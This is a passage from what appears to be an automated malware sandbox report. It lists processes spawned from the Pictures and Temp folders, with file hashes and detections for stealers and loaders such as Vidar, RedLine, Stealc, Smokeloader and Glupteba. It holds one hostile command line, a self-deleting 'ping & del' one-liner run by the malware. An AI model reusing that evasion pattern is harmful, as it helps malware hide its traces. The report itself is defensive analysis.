                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 58%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                                                            Start time:03:30:56
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:1'878'244 bytes
                                                                                                                                                                                                                                                            MD5 hash:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                                                            Start time:03:30:56
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:1'878'244 bytes
                                                                                                                                                                                                                                                            MD5 hash:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                                                            Start time:03:30:57
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:203'776 bytes
                                                                                                                                                                                                                                                            MD5 hash:DBA6DB51EA13E585AEE6136021836641
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000003.2437075338.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000F.00000003.2437075338.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000F.00000002.2758288970.0000000000958000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000F.00000002.2758267027.0000000000942000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                            • Detection: 29%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                                                            Start time:03:30:58
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:4'283'768 bytes
                                                                                                                                                                                                                                                            MD5 hash:54F38AF9A5ADA40065F7B6008661E8A1
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000010.00000002.3275239614.0000000001202000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                                            Start time:03:30:58
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:4'283'768 bytes
                                                                                                                                                                                                                                                            MD5 hash:54F38AF9A5ADA40065F7B6008661E8A1
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000011.00000002.3187282898.0000000001170000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                                            Start time:03:30:58
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:4'283'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:C03384EE0CB8E3A2FD0C84052AC0581F
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000012.00000002.3269213397.0000000001022000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                                                            Start time:03:30:58
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:1'878'244 bytes
                                                                                                                                                                                                                                                            MD5 hash:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                                                            Start time:03:30:58
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:4'283'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:C03384EE0CB8E3A2FD0C84052AC0581F
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000014.00000002.3245748971.000000000110C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                                                            Start time:03:31:02
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:323'584 bytes
                                                                                                                                                                                                                                                            MD5 hash:D9578A8E9EE343BC53B08FD8101F66E9
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 58%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                                                            Start time:03:31:02
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:237'568 bytes
                                                                                                                                                                                                                                                            MD5 hash:ED7321DFC04F801D87AB2F3B4ABCB8FB
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 47%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                                                            Start time:03:31:02
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:1'878'244 bytes
                                                                                                                                                                                                                                                            MD5 hash:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                                                            Start time:03:31:02
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:1'878'244 bytes
                                                                                                                                                                                                                                                            MD5 hash:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                                                            Start time:03:31:03
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:4'283'768 bytes
                                                                                                                                                                                                                                                            MD5 hash:54F38AF9A5ADA40065F7B6008661E8A1
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000019.00000002.3061309929.0000000000843000.00000040.00000001.01000000.0000001C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000019.00000002.3250452098.00000000032C3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000019.00000002.3250452098.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                                                            Start time:03:31:03
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:323'584 bytes
                                                                                                                                                                                                                                                            MD5 hash:D9578A8E9EE343BC53B08FD8101F66E9
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 58%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                                                            Start time:03:31:03
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:323'584 bytes
                                                                                                                                                                                                                                                            MD5 hash:D9578A8E9EE343BC53B08FD8101F66E9
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 58%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                                                            Start time:03:31:03
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:1'878'244 bytes
                                                                                                                                                                                                                                                            MD5 hash:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                                                            Start time:03:31:03
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe"
                                                                                                                                                                                                                                                            Imagebase:0x790000
                                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                                                            Start time:03:31:03
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:4'283'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:C03384EE0CB8E3A2FD0C84052AC0581F
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000001E.00000002.3216770112.0000000003203000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001E.00000002.3216770112.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000001E.00000002.3043788624.0000000000843000.00000040.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001E.00000002.3187121792.0000000001021000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                                                            Start time:03:31:04
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:1'878'244 bytes
                                                                                                                                                                                                                                                            MD5 hash:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                                                            Start time:03:31:04
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:4'283'768 bytes
                                                                                                                                                                                                                                                            MD5 hash:54F38AF9A5ADA40065F7B6008661E8A1
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000020.00000002.3398211956.00000000031C3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000020.00000002.3381975417.0000000000FDD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000020.00000002.3398211956.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000020.00000002.3259586341.0000000000843000.00000040.00000001.01000000.0000001F.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                                                            Start time:03:31:07
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:4'283'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:C03384EE0CB8E3A2FD0C84052AC0581F
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000021.00000002.3183308151.0000000000843000.00000040.00000001.01000000.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000021.00000002.3298037878.0000000003203000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000021.00000002.3266926233.000000000111E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
